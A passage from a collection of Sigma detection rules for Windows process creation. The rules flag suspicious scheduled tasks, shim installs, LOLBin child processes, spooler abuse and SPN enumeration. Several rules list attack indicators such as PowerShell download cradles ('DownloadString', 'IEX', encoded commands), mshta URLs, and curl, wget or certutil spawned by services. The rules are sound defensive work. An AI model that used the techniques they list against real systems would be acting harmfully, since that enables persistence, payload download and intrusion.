    "content": "title: Suspicious Command Patterns In Scheduled Task Creation\nid: f2c64357-b1d2-41b7-849f-34d2682c0fad\nstatus: test\ndescription: Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands\nreferences:\n    - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/\n    - https://twitter.com/RedDrip7/status/1506480588827467785\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2024-03-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_schtasks:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    selection_pattern_1:\n        CommandLine|contains:\n            - '/sc minute '\n            - '/ru system '\n    selection_pattern_2:\n        CommandLine|contains:\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cmd /r'\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n    selection_uncommon:\n        CommandLine|contains:\n            - ' -decode '\n            - ' -enc '\n            - ' -w hidden '\n            - ' bypass '\n            - ' IEX'\n            - '.DownloadData'\n            - '.DownloadFile'\n            - '.DownloadString'\n            - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785\n            - 'FromBase64String'\n            - 'mshta http'\n            - 'mshta.exe http'\n    selection_anomaly_1:\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\'\n            - '%AppData%'\n            - '%Temp%'\n            - '%tmp%'\n    selection_anomaly_2:\n        CommandLine|contains:\n            - 'cscript'\n            - 'curl'\n            - 'wscript'\n    condition: selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )\nfalsepositives:\n    - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_system.yml",
    "content": "title: Schtasks Creation Or Modification With SYSTEM Privileges\nid: 89ca78fd-b37c-4310-b3d3-81a023f83936\nstatus: test\ndescription: Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges\nreferences:\n    - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\nmodified: 2025-02-15\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_root:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains:\n            - ' /change '\n            - ' /create '\n    selection_run:\n        CommandLine|contains: '/ru '\n    selection_user:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space\n    filter_optional_teamviewer:\n        # FP from test set in SIGMA\n        # Cannot use ParentImage on all OSes for 4688 events\n        # ParentImage|contains|all:\n        #     - '\\AppData\\Local\\Temp\\'\n        #     - 'TeamViewer_.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/TN TVInstallRestore'\n            - '\\TeamViewer_.exe'\n    filter_optional_office:\n        CommandLine|contains|all:\n            # https://answers.microsoft.com/en-us/msoffice/forum/all/office-15-subscription-heartbeat-task-created-on/43ab5e53-a9fb-47c6-8c14-44889974b9ff\n            - 'Subscription Heartbeat'\n            - '\\HeartbeatConfig.xml'\n            - '\\Microsoft Shared\\OFFICE'\n    filter_optional_avira:\n        CommandLine|contains:\n            - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR '\n            - ':\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe'\n            - '/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml",
    "content": "title: Scheduled Task Creation Masquerading as System Processes\nid: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab\nstatus: experimental\ndescription: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /create '\n        CommandLine|contains:\n            - ' audiodg'\n            - ' conhost'\n            - ' dwm.exe'\n            - ' explorer'\n            - ' lsass'\n            - ' lsm'\n            - ' mmc'\n            - ' msiexec'\n            - ' regsvr32'\n            - ' rundll32'\n            - ' services'\n            - ' spoolsv'\n            - ' svchost'\n            - ' taskeng'\n            - ' taskhost'\n            - ' wininit'\n            - ' winlogon'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administration tasks scheduling trusted system processes.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml",
    "content": "title: Script Event Consumer Spawning Process\nid: f6d1dd2f-b8ce-40ca-bc23-062efb686b34\nstatus: test\ndescription: Detects a suspicious child process of Script Event Consumer (scrcons.exe).\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html\nauthor: Sittikorn S\ndate: 2021-06-21\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\scrcons.exe'\n        Image|endswith:\n            - '\\svchost.exe'\n            - '\\dllhost.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\schtasks.exe'\n            - '\\regsvr32.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\msbuild.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml",
    "content": "title: Potential Shim Database Persistence via Sdbinst.EXE\nid: 517490a7-115a-48c6-8862-1a481504d5a8\nrelated:\n    - id: 18ee686c-38a3-4f65-9f44-48a077141f42\n      type: similar\nstatus: test\ndescription: |\n    Detects installation of a new shim using sdbinst.exe.\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\nreferences:\n    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\nauthor: Markus Neis\ndate: 2019-01-16\nmodified: 2023-12-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sdbinst.exe'\n        - OriginalFileName: 'sdbinst.exe'\n    selection_cli:\n        CommandLine|contains: '.sdb'\n    filter_optional_iis:\n        ParentImage|endswith: '\\msiexec.exe'\n        CommandLine|contains:\n            # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120)\n            - ':\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb'\n            - ':\\Program Files\\IIS Express\\iisexpressshim.sdb'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml",
    "content": "title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE\nid: 18ee686c-38a3-4f65-9f44-48a077141f42\nrelated:\n    - id: 517490a7-115a-48c6-8862-1a481504d5a8\n      type: derived\nstatus: test\ndescription: |\n    Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2024-01-10\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\sdbinst.exe'\n        - OriginalFileName: 'sdbinst.exe'\n    filter_main_legit_ext:\n        CommandLine|contains: '.sdb'\n    filter_main_legit_extensions:\n        # ParentImage|endswith: ':\\Windows\\System32\\svchost.exe'\n        - CommandLine|endswith:\n              - ' -c'\n              - ' -f'\n              - ' -mm'\n              - ' -t'\n        - CommandLine|contains: ' -m -bg'\n    filter_main_null:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml",
    "content": "title: Sdclt Child Processes\nid: da2738f2-fadb-4394-afa7-0a0674885afa\nstatus: test\ndescription: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/6\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sdclt.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml",
    "content": "title: Sdiagnhost Calling Suspicious Child Process\nid: f3d39c45-de1a-4486-a687-ab126124f744\nstatus: test\ndescription: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\n    - https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n    - https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/\nauthor: Nextron Systems, @Kostastsale\ndate: 2022-06-01\nmodified: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sdiagnhost.exe'\n        Image|endswith:\n            # Add more suspicious LOLBins\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\taskkill.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            # - '\\csc.exe'   # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n            - '\\calc.exe'  # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n    filter_main_cmd_bits:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'bits'\n    filter_main_powershell_noprofile:\n        Image|endswith: '\\powershell.exe'\n        CommandLine|endswith:\n            - '-noprofile -'\n            - '-noprofile'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_secedit_execution.yml",
    "content": "title: Potential Suspicious Activity Using SeCEdit\nid: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb\nstatus: test\ndescription: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy\nreferences:\n    - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit\nauthor: Janantha Marasinghe\ndate: 2022-11-18\nmodified: 2022-12-30\ntags:\n    - attack.collection\n    - attack.discovery\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1562.002\n    - attack.t1547.001\n    - attack.t1505.005\n    - attack.t1556.002\n    - attack.t1562\n    - attack.t1574.007\n    - attack.t1564.002\n    - attack.t1546.008\n    - attack.t1546.007\n    - attack.t1547.014\n    - attack.t1547.010\n    - attack.t1547.002\n    - attack.t1557\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\secedit.exe'\n        - OriginalFileName: 'SeCEdit'\n    selection_flags_discovery:\n        CommandLine|contains|all:\n            - '/export'\n            - '/cfg'\n    selection_flags_configure:\n        CommandLine|contains|all:\n            - '/configure'\n            - '/db'\n    # filter:\n    #     SubjectUserName|endswith: '$'  SubjectUserName is from event ID 4719 in the Windows Security log\n    condition: selection_img and (1 of selection_flags_*)\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_security_susp_node_js_execution.yml",
    "content": "title: NodeJS Execution of JavaScript File\nid: ba3874b9-0fae-465f-836c-eb5d071a1789\nstatus: experimental\ndescription: |\n    Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\n    Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\n    Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\n    Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-21\ntags:\n    - attack.execution\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\node.exe'\n        - OriginalFileName: 'node.exe'\n        - Product: 'Node.js'\n    selection_cmd:\n        CommandLine|contains: '.js'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of node.exe to execute JavaScript or JSC files on your environment\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml",
    "content": "title: Suspicious Serv-U Process Pattern\nid: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf\nstatus: test\ndescription: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-14\nmodified: 2022-07-14\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - cve.2021-35211\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Serv-U.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\schtasks.exe'\n            - '\\regsvr32.exe'\n            - '\\wmic.exe'  # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\forfiles.exe'\n            - '\\scriptrunner.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Setres.EXE\nid: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7\nstatus: test\ndescription: |\n    Detects uncommon child process of Setres.EXE.\n    Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\n    It can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Setres/\n    - https://twitter.com/0gtweet/status/1583356502340870144\n    - https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: '@gott_cyber, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2022-12-11\nmodified: 2024-06-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\setres.exe'\n        Image|contains: '\\choice'\n    filter_main_legit_location:\n        Image|endswith:\n            - 'C:\\Windows\\System32\\choice.exe'\n            - 'C:\\Windows\\SysWOW64\\choice.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml",
    "content": "title: Potential SPN Enumeration Via Setspn.EXE\nid: 1eeed653-dbc8-4187-ad0c-eeebb20e6599\nstatus: test\ndescription: Detects service principal name (SPN) enumeration used for Kerberoasting\nreferences:\n    - https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation\n    - https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019\nauthor: Markus Neis, keepwatch\ndate: 2018-11-14\nmodified: 2023-10-23\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith: '\\setspn.exe'\n        - OriginalFileName: 'setspn.exe'\n        - Description|contains|all:\n              - 'Query or reset the computer'\n              - 'SPN attribute'\n    selection_cli:\n        CommandLine|contains:\n            - ' -q '\n            - ' /q '\n    condition: all of selection_*\nfalsepositives:\n    - Administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setup16_custom_lst_execution.yml",
    "content": "title: Setup16.EXE Execution With Custom .Lst File\nid: 99c8be4f-3087-4f9f-9c24-8c7e257b442e\nstatus: test\ndescription: |\n    Detects the execution of \"Setup16.EXE\" and old installation utility with a custom \".lst\" file.\n    These \".lst\" file can contain references to external program that \"Setup16.EXE\" will execute.\n    Attackers and adversaries might leverage this as a living of the land utility.\nreferences:\n    - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/\nauthor: frack113\ndate: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\SysWOW64\\setup16.exe'\n        ParentCommandLine|contains: ' -m '\n    filter_optional_valid_path:\n        Image|startswith: 'C:\\~MSSETUP.T\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - On modern Windows system, the \"Setup16\" utility is practically never used, hence false positive should be very rare.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_shutdown_execution.yml",
    "content": "title: Suspicious Execution of Shutdown\nid: 34ebb878-1b15-4895-b352-ca2eeb99b274\nstatus: test\ndescription: Use of the commandline to shutdown or reboot windows\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\shutdown.exe'\n        CommandLine|contains:\n            - '/r '\n            - '/s '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml",
    "content": "title: Suspicious Execution of Shutdown to Log Out\nid: ec290c06-9b6b-4338-8b6b-095c0f284f10\nstatus: test\ndescription: Detects the rare use of the command line tool shutdown to logoff a user\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nauthor: frack113\ndate: 2022-10-01\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\shutdown.exe'\n        CommandLine|contains: '/l'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml",
    "content": "title: Uncommon Sigverif.EXE Child Process\nid: 7d4aaec2-08ed-4430-8b96-28420e030e04\nstatus: test\ndescription: |\n    Detects uncommon child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.\nreferences:\n    - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/\n    - https://twitter.com/0gtweet/status/1457676633809330184\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2024-08-27\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sigverif.exe'\n    filter_main_werfault:\n        Image:\n            - 'C:\\Windows\\System32\\WerFault.exe'\n            - 'C:\\Windows\\SysWOW64\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml",
    "content": "title: Uncommon Child Processes Of SndVol.exe\nid: ba42babc-0666-4393-a4f7-ceaf5a69191e\nstatus: test\ndescription: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)\nreferences:\n    - https://twitter.com/Max_Mal_/status/1661322732456353792\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\SndVol.exe'\n    filter_main_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: ' shell32.dll,Control_RunDLL '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml",
    "content": "title: Audio Capture via SoundRecorder\nid: 83865853-59aa-449e-9600-74b9d89a6d6e\nstatus: test\ndescription: Detect attacker collecting audio via SoundRecorder application.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\SoundRecorder.exe'\n        CommandLine|contains: '/FILE'\n    condition: selection\nfalsepositives:\n    - Legitimate audio capture by legitimate user.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_speechruntime_child_process.yml",
    "content": "title: Suspicious Speech Runtime Binary Child Process\nid: 78f10490-f2f4-4d19-a75b-4e0683bf3b8d\nstatus: experimental\ndescription: |\n    Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.\n    Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.\nreferences:\n    - https://github.com/rtecCyberSec/SpeechRuntimeMove\nauthor: andrewdanis\ndate: 2025-10-23\nlogsource:\n    category: process_creation\n    product: windows\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1021.003\n    - attack.t1218\ndetection:\n    selection:\n        ParentImage|endswith: '\\SpeechRuntime.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml",
    "content": "title: Suspicious Splwow64 Without Params\nid: 1f1a8509-2cbb-44f5-8751-8e1571518ce2\nstatus: test\ndescription: Detects suspicious Splwow64.exe process without any command line parameters\nreferences:\n    - https://twitter.com/sbousseaden/status/1429401053229891590?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\splwow64.exe'\n        CommandLine|endswith: 'splwow64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml",
    "content": "title: Suspicious Spool Service Child Process\nid: dcdbc940-0bff-46b2-95f3-2d73f848e33b\nstatus: test\ndescription: Detects suspicious print spool service (spoolsv.exe) child processes.\nreferences:\n    - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md\nauthor: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)\ndate: 2021-07-11\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    spoolsv:\n        ParentImage|endswith: '\\spoolsv.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    suspicious_unrestricted:\n        Image|endswith:\n            - '\\gpupdate.exe'\n            - '\\whoami.exe'\n            - '\\nltest.exe'\n            - '\\taskkill.exe'\n            - '\\wmic.exe'\n            - '\\taskmgr.exe'\n            - '\\sc.exe'\n            - '\\findstr.exe'\n            - '\\curl.exe'\n            - '\\wget.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\accesschk.exe'\n            - '\\wevtutil.exe'\n            - '\\bcdedit.exe'\n            - '\\fsutil.exe'\n            - '\\cipher.exe'\n            - '\\schtasks.exe'\n            - '\\write.exe'\n            - '\\wuauclt.exe'\n            - '\\systeminfo.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    suspicious_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n    suspicious_net_filter:\n        CommandLine|contains: 'start'\n    suspicious_cmd:\n        Image|endswith: '\\cmd.exe'\n    suspicious_cmd_filter:\n        CommandLine|contains:\n            - '.spl'\n            - 'route add'\n            - 'program files'\n    suspicious_netsh:\n        Image|endswith: '\\netsh.exe'\n    suspicious_netsh_filter:\n        CommandLine|contains:\n            - 'add portopening'\n            - 'rule name'\n    suspicious_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    suspicious_powershell_filter:\n        CommandLine|contains: '.spl'\n    suspicious_rundll32_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    suspicious_rundll32_cli:\n        CommandLine|endswith: 'rundll32.exe'\n    condition: spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml",
